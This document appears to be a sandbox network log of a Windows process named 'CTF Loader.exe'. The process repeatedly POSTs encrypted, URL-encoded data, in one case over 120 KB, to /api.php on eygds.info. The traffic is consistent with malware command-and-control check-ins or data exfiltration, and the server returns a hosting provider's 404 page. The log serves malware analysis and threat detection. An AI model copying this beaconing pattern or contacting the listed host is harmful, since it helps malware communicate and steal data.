Dec 30, 2024 01:58:37.394705057 CET	1236	IN	HTTP/1.1 404 Not Found Connection: close content-type: text/html last-modified: Thu, 30 Sep 2021 12:49:03 GMT etag: "999-6155b23f-9b1e2da8109d46d3;;;" accept-ranges: bytes content-length: 2457 date: Mon, 30 Dec 2024 00:58:37 GMT server: LiteSpeed platform: hostinger panel: hpanel Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 73 69 6f 63 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 6e 73 23 20 73 69 6f 63 74 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 74 79 70 65 73 23 20 73 6b 6f 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 34 2f 30 32 2f 73 6b 6f 73 2f 63 6f 72 65 23 20 78 73 64 3a 20 68 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-us" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# sioc: http://rdfs.org/sioc/ns# sioct: http://rdfs.org/sioc/types# skos: http://www.w3.org/2004/02/skos/core# xsd: http://www.w3.org/2001/XMLSchema#"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <style type="text/css"> @charset "UTF-8"; [ng\:cloak], [ng-cloak], [data-ng-cloak], [x-ng-cloak], .ng-cloak, .x-ng-cloak, .ng-hide:not(.ng-hide-animate) { display: none !important; } ng\:form { display: block; } .ng-animate-shim { visibility: hidden; } .ng-anchor { position: absolute; } </style> <meta http
Dec 30, 2024 01:58:37.394721031 CET	1236	IN	Data Raw: 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 Data Ascii: -equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Oops, something lost</title> <meta name="description" content="Oops, looks like the page is lost. Start your we
Dec 30, 2024 01:58:37.394735098 CET	279	IN	Data Raw: 74 2e 70 6e 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 4f 6f 70 73 2c 20 6c 6f 6f 6b 73 20 6c 69 6b 65 20 74 68 65 20 70 61 67 65 20 69 73 20 6c 6f 73 74 2e 3c 2f 68 31 3e 0a 20 20 20 20 20 20 20 20 20 20 Data Ascii: t.png"> <h1>Oops, looks like the page is lost.</h1> <p style="font-size:22px;" class="sub-header text-block-narrow">This is not a fault, just an accident that was not intentional.</p> </d

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	50024	156.67.74.96	80	2756	C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe

Timestamp	Bytes transferred	Direction	Data
Dec 30, 2024 01:58:41.129559040 CET	254	OUT	POST /api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: eygds.info Content-Length: 286 Expect: 100-continue
Dec 30, 2024 01:58:41.475423098 CET	286	OUT	Data Raw: 70 3d 32 71 48 30 4b 42 48 48 6c 70 4d 72 49 79 6b 47 2f 59 56 69 37 4a 56 31 25 32 42 25 32 42 45 37 71 41 77 32 37 52 72 62 56 7a 39 54 36 45 33 38 52 5a 33 48 57 59 7a 5a 75 6c 70 35 43 66 6c 6f 72 66 45 4a 58 63 47 66 49 54 6c 2f 74 48 35 33 Data Ascii: p=2qH0KBHHlpMrIykG/YVi7JV1%2B%2BE7qAw27RrbVz9T6E38RZ3HWYzZulp5CflorfEJXcGfITl/tH53qbP3ybh%2B5R%2BoQfDJYdxY%2BLeL4CfPUNjeMyQYy%2BhznJ/iR%2B8EfLeOyp5yqnHAxQIhLcFZI8Mkffz42B7krq2u7OXqqle7sxfGYqM4gionehlh7cV962TIKR3V7cktRe%2BNwMtZWMxPYK2AGL8riBZtj
Dec 30, 2024 01:58:41.679069042 CET	25	IN	HTTP/1.1 100 Continue
Dec 30, 2024 01:58:41.679220915 CET	1236	IN	HTTP/1.1 404 Not Found Connection: Keep-Alive Keep-Alive: timeout=5, max=100 content-type: text/html last-modified: Thu, 30 Sep 2021 12:49:03 GMT etag: "999-6155b23f-9b1e2da8109d46d3;;;" accept-ranges: bytes content-length: 2457 date: Mon, 30 Dec 2024 00:58:41 GMT server: LiteSpeed platform: hostinger panel: hpanel Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 73 69 6f 63 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 6e 73 23 20 73 69 6f 63 74 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 74 79 70 65 73 23 20 73 6b 6f 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 34 2f 30 32 2f 73 6b 6f 73 2f 63 6f 72 65 23 20 78 73 64 3a 20 68 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-us" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# sioc: http://rdfs.org/sioc/ns# sioct: http://rdfs.org/sioc/types# skos: http://www.w3.org/2004/02/skos/core# xsd: http://www.w3.org/2001/XMLSchema#"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <style type="text/css"> @charset "UTF-8"; [ng\:cloak], [ng-cloak], [data-ng-cloak], [x-ng-cloak], .ng-cloak, .x-ng-cloak, .ng-hide:not(.ng-hide-animate) { display: none !important; } ng\:form { display: block; } .ng-animate-shim { visibility: hidden; } .ng-anchor { position: absolute;
Dec 30, 2024 01:58:41.679234982 CET	224	IN	Data Raw: 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 Data Ascii: } </style> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Oops, something lost</title> <meta name="description" c
Dec 30, 2024 01:58:41.679250002 CET	1236	IN	Data Raw: 6f 6e 74 65 6e 74 3d 22 4f 6f 70 73 2c 20 6c 6f 6f 6b 73 20 6c 69 6b 65 20 74 68 65 20 70 61 67 65 20 69 73 20 6c 6f 73 74 2e 20 53 74 61 72 74 20 79 6f 75 72 20 77 65 62 73 69 74 65 20 6f 6e 20 74 68 65 20 63 68 65 61 70 2e 22 3e 0a 20 20 20 20 Data Ascii: ontent="Oops, looks like the page is lost. Start your website on the cheap."> <link media="all" rel="stylesheet" href="/htdocs_error/style.css"> <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap
Dec 30, 2024 01:58:41.679265022 CET	92	IN	Data Raw: 63 69 64 65 6e 74 20 74 68 61 74 20 77 61 73 20 6e 6f 74 20 69 6e 74 65 6e 74 69 6f 6e 61 6c 2e 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e Data Ascii: cident that was not intentional.</p> </div> </div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	50025	156.67.74.96	80	2756	C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe

Timestamp	Bytes transferred	Direction	Data
Dec 30, 2024 01:58:41.256341934 CET	257	OUT	POST /api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: eygds.info Content-Length: 124324 Expect: 100-continue
Dec 30, 2024 01:58:41.615740061 CET	12360	OUT	Data Raw: 70 3d 70 68 44 68 54 7a 34 6c 4b 64 71 69 49 61 55 69 41 71 4a 38 25 32 42 57 2f 4b 61 58 4b 50 5a 5a 6f 6e 73 79 4b 74 61 38 52 44 64 32 34 42 69 4c 7a 62 62 72 36 6e 47 6b 71 45 48 35 56 48 6f 4d 34 48 58 45 33 56 69 35 34 70 33 4f 77 4a 32 75 Data Ascii: p=phDhTz4lKdqiIaUiAqJ8%2BW/KaXKPZZonsyKta8RDd24BiLzbbr6nGkqEH5VHoM4HXE3Vi54p3OwJ2u7b1%2BuDbKYThHqXrdRy4miW08bk8Zg9p5XsP%2Bc/MmRRtaIEBbsfP0YfRNNarEZc9oxWASh1iQjZ3pUh9yjMurmGJ5P3gl8S1YxwSnyegAQedvLEgjgOMA67lum/JMG87OCde36frctmOgvQnUovMamRRP%2BSS
Dec 30, 2024 01:58:41.620656013 CET	2472	OUT	Data Raw: 71 62 52 45 32 7a 54 6c 5a 6e 36 25 32 42 6b 31 42 35 30 65 47 48 63 4a 36 53 62 55 47 73 4b 48 78 33 59 4c 47 6f 36 44 72 68 73 31 70 41 4d 37 6c 33 78 4c 5a 58 73 59 46 34 6a 53 65 61 31 4b 61 4d 51 45 70 65 25 32 42 49 57 56 6c 4a 53 4a 43 44 Data Ascii: qbRE2zTlZn6%2Bk1B50eGHcJ6SbUGsKHx3YLGo6Drhs1pAM7l3xLZXsYF4jSea1KaMQEpe%2BIWVlJSJCDNkzc8ymnYC0CSE%2BC3lC2KxPIxHiSf6tGi2YljQfXN%2BUqfcWlDFtovcKoymuLR9oHKST4A%2BUGhMPK6eX%2Bo/tvbjxfcC4fMwi7hI9Df3Au9bgNcpqdY9B9l0jbmUkXVUBD9DCWF5ir7LplYu6/YP9PYPlGc
Dec 30, 2024 01:58:41.620683908 CET	4944	OUT	Data Raw: 58 2f 36 4c 62 58 54 6a 4d 65 48 4b 63 42 6f 33 6b 5a 5a 33 31 25 32 42 52 77 38 42 67 58 37 42 6e 4a 46 31 4b 55 79 61 34 4f 75 35 57 50 50 39 78 49 4c 5a 43 33 31 54 59 69 79 73 56 70 56 52 4f 43 33 67 61 39 59 66 34 72 51 39 36 78 63 75 50 74 Data Ascii: X/6LbXTjMeHKcBo3kZZ31%2BRw8BgX7BnJF1KUya4Ou5WPP9xILZC31TYiysVpVROC3ga9Yf4rQ96xcuPtAdetHUUIeAklDgB4WaoALAyupLBqvZW3QHmvvxDfu6Ep9XVW85zDgeEnCZqyCfg4aRDmkThJa1dsqUwyTsT/OEeJ0SE1PbIXvoOZalZtLQusqUwyTsT/OE9k4khr8Mjxtl4slJ6fAXcRe911E8zZ%2B7JxAUXSnfR
Dec 30, 2024 01:58:41.620721102 CET	4944	OUT	Data Raw: 44 6b 70 56 44 76 5a 42 67 63 79 55 4c 34 55 46 32 53 49 4d 57 47 52 75 70 73 46 36 43 38 4b 36 30 4d 25 32 42 33 6d 33 58 75 66 48 25 32 42 37 63 51 77 42 61 68 74 65 59 56 52 59 66 2f 78 58 48 61 31 42 68 39 6a 38 4c 76 58 72 53 6a 4c 6c 54 46 Data Ascii: DkpVDvZBgcyUL4UF2SIMWGRupsF6C8K60M%2B3m3XufH%2B7cQwBahteYVRYf/xXHa1Bh9j8LvXrSjLlTFvrWqu/tHF0LPAPKe41xP/l89csBvcYC2ASPmOcMvyVwTaoCLL%2BWyvz5C1ZlDDTOuaBh64P6mZvHcMgjwH6wfI5SzGu%2BxsolmVSM%2B0NF00Vyc/m97zwjsMD90CH7H3f38EOw0C1myHLXHmvfeytt7QBoUmw8
Dec 30, 2024 01:58:41.620907068 CET	4944	OUT	Data Raw: 42 6e 44 32 68 37 55 25 32 42 4a 36 43 61 77 64 50 56 6b 38 45 44 54 58 47 6d 30 43 77 43 47 4b 64 58 4d 33 56 54 7a 75 2f 48 4a 69 6f 4d 77 4b 46 79 4a 56 2f 78 6a 56 68 42 2f 35 62 44 49 70 58 73 70 58 66 41 42 77 68 43 4c 35 64 4a 72 25 32 42 Data Ascii: BnD2h7U%2BJ6CawdPVk8EDTXGm0CwCGKdXM3VTzu/HJioMwKFyJV/xjVhB/5bDIpXspXfABwhCL5dJr%2BMhdNnQNn9tlBuC9NCwzvc7gV2EJCcOXNU3rMVq6KED/ZOe7omDAMvhnI4kpMwrLa1iLwiq1ls6ojR16oGj7lDDdc7RwCfchYgQHObK9GSWkIcZ7GNZZx5YPuJBk4A2D0CD%2Bu6Q8osLh4YvkNAmOtk2rYpXJbPfn
Dec 30, 2024 01:58:41.621000051 CET	2472	OUT	Data Raw: 59 79 64 4a 6d 5a 25 32 42 77 36 37 4a 72 75 75 56 41 72 48 64 30 46 39 75 74 55 79 35 7a 4c 66 33 76 6a 7a 30 4c 32 59 63 36 39 64 77 5a 4e 34 68 6a 65 39 61 39 33 50 5a 35 6d 78 53 52 43 2f 6d 66 67 6a 66 5a 57 44 38 79 35 4b 6f 54 6d 44 65 57 Data Ascii: YydJmZ%2Bw67JruuVArHd0F9utUy5zLf3vjz0L2Yc69dwZN4hje9a93PZ5mxSRC/mfgjfZWD8y5KoTmDeWnsYIXJOxLL%2BThcqR0fJ855ex%2BUNVFMyPWPnPiYvDRh8zb33DXtU0zIxs6S5jKDCkSW9IIFo6hDZWMzWoh4QaCE8rJk3hAf6zx1J1prTdLYLIwvQodh4l8Skf3zRCgq43JRWXAMGlO6jgUF8A5490%2BBqSyIs
Dec 30, 2024 01:58:41.621010065 CET	2472	OUT	Data Raw: 78 6a 32 64 77 77 7a 6a 66 4d 49 59 69 48 6a 55 5a 47 4c 5a 77 25 32 42 30 67 74 36 74 66 66 33 48 6f 4d 51 37 6b 25 32 42 67 67 37 6a 4a 49 37 66 4d 64 32 4d 77 53 33 6b 39 4b 6e 39 74 59 70 6b 62 39 50 30 46 37 6c 44 25 32 42 51 43 41 37 4a 35 Data Ascii: xj2dwwzjfMIYiHjUZGLZw%2B0gt6tff3HoMQ7k%2Bgg7jJI7fMd2MwS3k9Kn9tYpkb9P0F7lD%2BQCA7J5X5fHV4XrKcUHCts6WLdNsW%2BlZB8W9anYo1u/MzpeDQ%2B1aUzKfDjA7jeeig7OSmCObPRiCOeOcmB383xjpiWfPEJHKPzgulG0aWkRfN8EUAokEuSsM3iYlbIIO3YSZaH4YJ/ko1m4qoZtgvf9F1IRNN9Q8lB1n
Dec 30, 2024 01:58:41.621071100 CET	2472	OUT	Data Raw: 42 71 7a 38 6a 52 41 4f 69 4b 41 6c 54 42 2f 73 48 72 4a 6e 42 35 72 59 47 41 56 4f 75 4b 76 52 31 67 58 30 76 69 49 51 77 2f 4c 6c 62 39 73 32 67 74 55 79 30 76 41 31 4a 71 62 44 58 25 32 42 4f 32 6e 66 61 6f 33 57 77 36 42 4d 37 31 59 65 30 54 Data Ascii: Bqz8jRAOiKAlTB/sHrJnB5rYGAVOuKvR1gX0viIQw/Llb9s2gtUy0vA1JqbDX%2BO2nfao3Ww6BM71Ye0T0Tk%2Bzh1H51Y25kqnjZaoIe3xUaMFC9DjvBRXhdQasl6oFQ3v6097JAJfyImfJFORFAYaZWFbM7vVq0I9dF6VoaGvp6MvMUePB4wGw9LSk6M4UL/VOcKZTvKpTlu57QYJfo3PJZzC7EZYycCA8GzGq1tokzMf2q/
Dec 30, 2024 01:58:41.625574112 CET	4944	OUT	Data Raw: 6a 53 39 6a 78 42 7a 79 61 6f 6a 63 6a 57 6a 51 38 63 43 51 6e 78 72 6d 33 4c 66 67 42 4b 55 6c 69 42 54 35 37 54 67 75 33 36 45 62 39 4b 7a 77 45 70 35 66 63 34 45 54 41 6f 44 51 38 33 64 7a 73 61 79 36 47 4e 78 32 73 41 78 57 71 50 69 61 58 36 Data Ascii: jS9jxBzyaojcjWjQ8cCQnxrm3LfgBKUliBT57Tgu36Eb9KzwEp5fc4ETAoDQ83dzsay6GNx2sAxWqPiaX6r6p38GoL1wOwKGwK4LpYfHHAeXE7UfOgbxdgW243N4IlcHwvLmspe1JfU3I1ptyyvUptInYL7DclFd86OyF1WSU3QiQYpc%2BI8C%2BKXpK7R4R8Yirc0ajj7hnf4t6ZEg0%2BQezh9F5E3NqBF6tcaHXT5LD81nY
Dec 30, 2024 01:58:41.625638008 CET	7416	OUT	Data Raw: 74 31 78 73 57 6b 39 6f 72 79 76 66 6b 43 58 35 52 33 41 52 45 74 43 77 39 72 58 48 61 53 33 5a 71 69 47 4f 41 77 6b 34 42 69 77 78 47 44 41 6b 63 53 58 44 4f 7a 2f 76 71 46 76 74 44 39 33 63 72 59 4c 46 44 37 66 5a 6f 74 75 65 46 54 61 4d 56 34 Data Ascii: t1xsWk9oryvfkCX5R3AREtCw9rXHaS3ZqiGOAwk4BiwxGDAkcSXDOz/vqFvtD93crYLFD7fZotueFTaMV4qwLHfzF2AjTN%2BYU/74BHSPalatYp7HyR2PJxhNHq7L4RZUgpfh3bgcn2ImBPKjGxnWxvwRM6KE3jgjYA3sKjn4G0eyFZ2V4YBYi59x1B3UFw3czinJeqgqJ8s%2BckRyyV6wzgpJNrv%2BUxA3oVWgi4Pcmrvwa
Dec 30, 2024 01:58:41.797516108 CET	25	IN	HTTP/1.1 100 Continue
Dec 30, 2024 01:58:41.797588110 CET	1236	IN	HTTP/1.1 404 Not Found Connection: close content-type: text/html last-modified: Thu, 30 Sep 2021 12:49:03 GMT etag: "999-6155b23f-9b1e2da8109d46d3;;;" accept-ranges: bytes content-length: 2457 date: Mon, 30 Dec 2024 00:58:41 GMT server: LiteSpeed platform: hostinger panel: hpanel Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 73 69 6f 63 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 6e 73 23 20 73 69 6f 63 74 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 74 79 70 65 73 23 20 73 6b 6f 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 34 2f 30 32 2f 73 6b 6f 73 2f 63 6f 72 65 23 20 78 73 64 3a 20 68 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-us" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# sioc: http://rdfs.org/sioc/ns# sioct: http://rdfs.org/sioc/types# skos: http://www.w3.org/2004/02/skos/core# xsd: http://www.w3.org/2001/XMLSchema#"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <style type="text/css"> @charset "UTF-8"; [ng\:cloak], [ng-cloak], [data-ng-cloak], [x-ng-cloak], .ng-cloak, .x-ng-cloak, .ng-hide:not(.ng-hide-animate) { display: none !important; } ng\:form { display: block; } .ng-animate-shim { visibility: hidden; } .ng-anchor { position: absolute; } </style> <meta http

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	50026	156.67.74.96	80	2756	C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe

Timestamp	Bytes transferred	Direction	Data
Dec 30, 2024 01:58:56.562427044 CET	254	OUT	POST /api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: eygds.info Content-Length: 318 Expect: 100-continue
Dec 30, 2024 01:58:56.912481070 CET	318	OUT	Data Raw: 70 3d 53 50 74 31 6f 66 78 74 4b 32 44 43 4d 33 76 36 48 52 54 61 63 6d 33 63 4e 6b 70 59 32 6f 30 74 64 45 33 70 58 52 25 32 42 69 6e 4d 7a 59 62 6c 48 35 41 74 35 59 38 62 56 30 72 41 69 44 59 37 4d 46 68 34 79 5a 7a 2f 55 6b 4a 45 44 6e 73 48 Data Ascii: p=SPt1ofxtK2DCM3v6HRTacm3cNkpY2o0tdE3pXR%2BinMzYblH5At5Y8bV0rAiDY7MFh4yZz/UkJEDnsHiWnAK5VejmZXtsIuHczvuI8Qi03QJqxSPJtwtskgk6aCWwwi02LX4Yb/0Zd93ojmhbn3r3ad0Il0nvMjTt02Pe9RI5K5tzpxNMU6meKEHoOH%2BCCrwJE9NzmCefLQuoszSDLx8X8KJFwaeHhu7wW7bvMn83umqay
Dec 30, 2024 01:58:57.215054035 CET	1236	IN	HTTP/1.1 100 Continue Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65 6f 75 74 3d 35 2c 20 6d 61 78 3d 31 30 30 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 6c 61 73 74 2d 6d 6f 64 69 66 69 65 64 3a 20 54 68 75 2c 20 33 30 20 53 65 70 20 32 30 32 31 20 31 32 3a 34 39 3a 30 33 20 47 4d 54 0d 0a 65 74 61 67 3a 20 22 39 39 39 2d 36 31 35 35 62 32 33 66 2d 39 62 31 65 32 64 61 38 31 30 39 64 34 36 64 33 3b 3b 3b 22 0d 0a 61 63 63 65 70 74 2d 72 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 63 6f 6e 74 65 6e 74 2d 6c 65 6e 67 74 68 3a 20 32 34 35 37 0d 0a 64 61 74 65 3a 20 4d 6f 6e 2c 20 33 30 20 44 65 63 20 32 30 32 34 20 30 30 3a 35 38 3a 35 37 20 47 4d 54 0d 0a 73 65 72 76 65 72 3a 20 4c 69 74 65 53 70 65 65 64 0d 0a 70 6c 61 74 66 6f 72 6d 3a 20 68 6f 73 74 69 6e 67 65 72 0d 0a 70 61 6e 65 6c 3a 20 68 70 61 6e 65 6c 0d 0a 0d 0a 3c 21 44 4f 43 54 59 [TRUNCATED] Data Ascii: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100content-type: text/htmllast-modified: Thu, 30 Sep 2021 12:49:03 GMTetag: "999-6155b23f-9b1e2da8109d46d3;;;"accept-ranges: bytescontent-length: 2457date: Mon, 30 Dec 2024 00:58:57 GMTserver: LiteSpeedplatform: hostingerpanel: hpanel<!DOCTYPE html><html lang="en-us" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# sioc: http://rdfs.org/sioc/ns# sioct: http://rdfs.org/sioc/types# skos: http://www.w3.org/2004/02/skos/core# xsd: http://www.w3.org/2001/XMLSchema#"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <style type="text/css"> @charset "UTF-8"; [ng\:cloak], [ng-cloak], [data-ng-cloak], [x-ng-cloak], .ng-cloak, .x-ng-cloak, .ng-hide:not(.ng-hide-animate) { [TRUNCATED]
Dec 30, 2024 01:58:57.215070963 CET	1236	IN	Data Raw: 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 Data Ascii: position: absolute; } </style> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Oops, something lost</title> <meta name="descript
Dec 30, 2024 01:58:57.215085983 CET	341	IN	Data Raw: 65 64 22 3e 3c 69 6d 67 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 35 30 30 70 78 3b 22 20 73 72 63 3d 22 2f 68 74 64 6f 63 73 5f 65 72 72 6f 72 2f 73 6f 6d 65 74 68 69 6e 67 2d 6c 6f 73 74 2e 70 6e 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: ed"><img style="width:500px;" src="/htdocs_error/something-lost.png"> <h1>Oops, looks like the page is lost.</h1> <p style="font-size:22px;" class="sub-header text-block-narrow">This is not a fault, just

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	50027	156.67.74.96	80	2756	C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe

Timestamp	Bytes transferred	Direction	Data
Dec 30, 2024 01:58:56.567388058 CET	278	OUT	POST /api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: eygds.info Content-Length: 286 Expect: 100-continue Connection: Keep-Alive
Dec 30, 2024 01:58:56.912527084 CET	286	OUT	Data Raw: 70 3d 32 71 48 30 4b 42 48 48 6c 70 4d 72 49 79 6b 47 2f 59 56 69 37 4a 56 31 25 32 42 25 32 42 45 37 71 41 77 32 37 52 72 62 56 7a 39 54 36 45 33 38 52 5a 33 48 57 59 7a 5a 75 6c 70 35 43 66 6c 6f 72 66 45 4a 58 63 47 66 49 54 6c 2f 74 48 35 33 Data Ascii: p=2qH0KBHHlpMrIykG/YVi7JV1%2B%2BE7qAw27RrbVz9T6E38RZ3HWYzZulp5CflorfEJXcGfITl/tH53qbP3ybh%2B5R%2BoQfDJYdxY%2BLeL4CfPUNjeMyQYy%2BhznJ/iR%2B8EfLeOyp5yqnHAxQIhLcFZI8Mkffz42B7krq2u7OXqqle7sxfGYqM4gionehlh7cV962TIKR3V7cktRe%2BNwMtZWMxPYK2AGL8riBZtj
